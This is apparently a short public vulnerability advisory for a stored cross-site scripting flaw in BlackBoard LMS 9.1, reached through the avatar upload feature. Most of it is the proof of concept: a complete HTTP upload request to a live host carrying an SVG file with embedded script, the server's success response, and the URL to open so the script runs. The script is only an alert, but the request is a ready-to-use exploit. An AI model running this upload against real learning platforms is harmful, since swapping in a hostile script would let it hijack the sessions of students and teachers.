BlackBoard LMS version 9.1.140152.0 suffers from a cross site scripting vulnerability that can be leveraged through an arbitrary file upload.
fb00b9f4d5c76705cd84cf906ed2e0ee3d584d564052ebe3070382778bf6f495
Document Title:
===============
BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File Upload
Product Description:
===============
The Learning Management System has changed the way students and
educators interact.
Blackboard's LMS solutions offer much more than simple, classroom interaction,
they support the entire education experience enabling educators to not
only interact,
but truly engage their students in learning.
Homepage: http://www.blackboard.com/learning-management-system/index.aspx
PoC:
===============
POST /webapps/Bb-sites-user-profile-BBLEARN/uploadAvatar.do HTTP/1.1
Host: www.coursesites.com
------WebKitFormBoundaryMB47ytMHFUAG9AAt
Content-Disposition: form-data; name="avatarFile"; filename="badsv2.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert("ismail1337");
</script>
</svg>
------WebKitFormBoundaryMB47ytMHFUAG9AAt--
Response:
{"success":true,"message":"/bbcswebdav/users/your_user_id/public_html/badsv2.svg"}
Navigate to the returned URL path:
https://www.coursesites.com/bbcswebdav/users/your_user_id
/public_html/badsv2.svg